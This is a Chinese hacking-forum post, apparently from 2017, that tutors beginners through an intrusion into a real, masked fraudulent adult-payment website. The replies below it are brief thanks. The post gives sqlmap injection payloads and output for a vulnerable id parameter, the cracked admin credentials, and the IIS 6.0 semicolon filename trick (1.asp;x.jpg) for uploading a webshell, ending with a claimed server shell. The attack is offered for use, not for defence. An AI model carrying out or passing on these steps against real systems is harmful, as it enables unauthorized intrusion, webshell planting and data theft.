守夜人讨论区
搜索
查看: 298|回复: 5

(视频教程)实战入侵某虚假色情网站

[复制链接]

100

主题

111

帖子

214701万

积分

守夜人管理员

Rank: 9Rank: 9Rank: 9

积分
2147013467
发表于 2017-8-21 17:00:24 | 显示全部楼层 |阅读模式



                             实战入侵某虚假色情网站(诱导支付骗钱的网站)


                                   给新手看的,讲的还算详细


                     gwdrywdtgdsfgf.png


目标:http://www.******.com/




某天突然跳出来一个**网站,打开忽然是酱紫一个操作。。。我裤子都脱了你给我看这个??


不服。。。。。


扫一下目录看看


后台地址/admin


判断下环境   iis6.0(有经验的可以直接通过错误页面看出来)


也可以去爱站网去查下(我这边不知道什么情况,有时候打开爱站卡的不要不要的)


服务器类型Microsoft-IIS/6.0


我们找到了一个该网站的注入点(寻找过程略微复杂,略过)


以获取注入点          tuku/images.php?id=35




http://www.******.com/tuku/images.php?id=35


php的一个注入,字符串型的get注入


可以用sqlmap,明小子等各种工具(本机没装python,虚拟机懒得打开。。但是我有免python版的sqlmap)



Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=35' AND 6177=6177 AND 'fQpn'='fQpn

    Type: UNION query
    Title: MySQL UNION query (NULL) - 8 columns
    Payload: id=35' LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, NULL, CONCAT(0x3a6b65773a,0x44684a4f6d4a4977694b,0x3a7476673a), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=35' AND SLEEP(5) AND 'PcdT'='PcdT
---
[16:38:18] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
back-end DBMS: MySQL 5.0.11



数据库:wuming




其实大家也可以不用sqlmap,对于这种比较简单的注入,可以用明小子等适合新手的工具,这里给大家推荐一个
safe3注入的一个工具,sqlmap就不演示了




这款工具相对来说更方便快捷(如果这些工具无法进行,那就用sqlmap)




admin|21232f297a57a5a743894a0e4a801fc3


admin   admin


登录了后台以后,我们要找一个上传点,因为我们之前已经探测好了环境是iis6.0


iis6.0存在解析漏洞:1. 建立畸形目录如/1.asp/1.jpg  这样1.jpg就会被当做asp来执行
                    2.文件名为1.asp;.jpg   iis6.0中会过滤掉分号后面的内容,从而变成1.asp去执行


很显然,我们目前不能建立一个畸形目录,那么我们就用第二种






http://www.******.com/img/img_3696136961.asp;x.jpg


我们可以看到,我们的小马已经解析成功了    ;x.jpg这些会被过滤掉


我们上传一句话木马,大马什么的都可以   成功拿下shell




工具已打包




















游客,如果您要查看本帖隐藏内容请回复



守夜人讨论区bbs.0daycode.com

0

主题

2

帖子

29

积分

守夜新人

Rank: 1

积分
29
发表于 2017-8-21 18:16:19 | 显示全部楼层
good think! bro !!!!!!!!!!!!!!!!
守夜人讨论区bbs.0daycode.com

2

主题

32

帖子

207

积分

正式成员

Rank: 2

积分
207
发表于 2017-8-24 21:27:24 | 显示全部楼层
                                     good
守夜人讨论区bbs.0daycode.com

0

主题

11

帖子

180

积分

正式成员

Rank: 2

积分
180
发表于 2017-9-1 22:38:02 | 显示全部楼层
感谢楼主分享
守夜人讨论区bbs.0daycode.com

0

主题

1

帖子

27

积分

守夜新人

Rank: 1

积分
27
发表于 2017-9-6 00:15:53 | 显示全部楼层
感谢楼主分享
守夜人讨论区bbs.0daycode.com

0

主题

3

帖子

26

积分

守夜新人

Rank: 1

积分
26
发表于 2017-9-11 23:34:31 | 显示全部楼层
乌鸦坐飞机!
守夜人讨论区bbs.0daycode.com

QQ咨询|小黑屋|守夜人  

GMT+8, 2017-9-24 12:54

Powered by 守夜人讨论区 Array

© 2017-2099

快速回复 返回顶部 返回列表